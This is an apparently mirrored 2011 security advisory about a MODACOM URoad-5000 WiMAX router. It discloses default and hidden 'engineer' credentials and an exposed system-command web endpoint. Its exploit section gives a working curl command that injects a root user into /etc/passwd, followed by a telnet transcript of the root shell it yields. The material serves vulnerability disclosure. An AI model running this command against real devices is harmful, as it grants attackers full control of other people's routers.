Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

MODACOM URoad-5000 1450 - Remote Command Execution / Backdoor Access

🗓️ 02 Jun 2011 00:00:00Reported by Alex StanevType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 31 Views

MODACOM URoad-5000 1450 - Remote Command Execution and Backdoor Access on Linux-based WiMAX Route

Code
      ================================================
     == Alex Stanev Security Advisory #4 @31.05.2011 ==
     ==             http://sec.stanev.org            ==
      ================================================

PRODUCT
     URoad-5000

VENDOR
     MODACOM [http://www.modacom.co.kr]

VERSIONS AFFECTED
     v1450

CLASS
     Remote command execution/Backdoor

PRODUCT DESCRIPTION
     URoad-5000 is integrated battery powered wireless router. It comes with only one external USB
     interface and no other hardware comm interfaces (such as ethernet). Based on RaLink SoC 3050.
     The USB port is used for connection with MW-U3050, which is USB WiMAX dongle.
     Linux inside.
     Often marketed as WiMAX 2 WiFi "converter".

THE PROBLEM
     The box uses modified version of RaLink SDK. The standard web interface is accessed via HTTP.
     1) Web administration interface can be accessed with standard user/password pair admin:admin
     This can be later changed, but there is another possible access pair - engineer:engineer
     and it can't be changed via the web interface.
     2) Some of the SDK standard scripts are left and their screens in the web interface are just
     HTML commented. This reveals the /goform/SystemCommand method.

EXPLOIT
     1) Remote add r00t user with password boza
          $curl --basic -u "engineer:engineer" \
	        -d "command=echo -e \"r00t:CRYM.sLY1U1AI:0:0:Adminstrator:/:/bin/sh\" >> /etc/passwd;&SystemCommandSubmit=Apply" \
	        192.168.100.254/goform/SystemCommand
          $telnet 192.168.100.254
          Trying 192.168.100.254...
          Connected to 192.168.100.254.
          modacom login: r00t
          Password: boza
          BusyBox v1.12.1 (2010-03-05 21:33:57 KST) built-in shell (ash)
          Enter 'help' for a list of built-in commands.
          #

ADDITIONAL INFO
     The flaw was presented on OpenFest 2010.
     Presentation: http://openfest.org/files/slides-2010/OpenFest2010_Reverse_engineering_Alex_Stanev.pdf [in bulgarian]

PATCH/WORKAROUND
     No workaround possible. Next version?

VENDOR STATUS
     NOT informed. Backdoor.

     =========================
    ==           EOF         ==
    == http://sec.stanev.org ==
     =========================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Jun 2011 00:00Current
7.4High risk
Vulners AI Score7.4
modacom uroad-5000remote command executionbackdoor accesslinux-basedwimax routersecurity advisory
31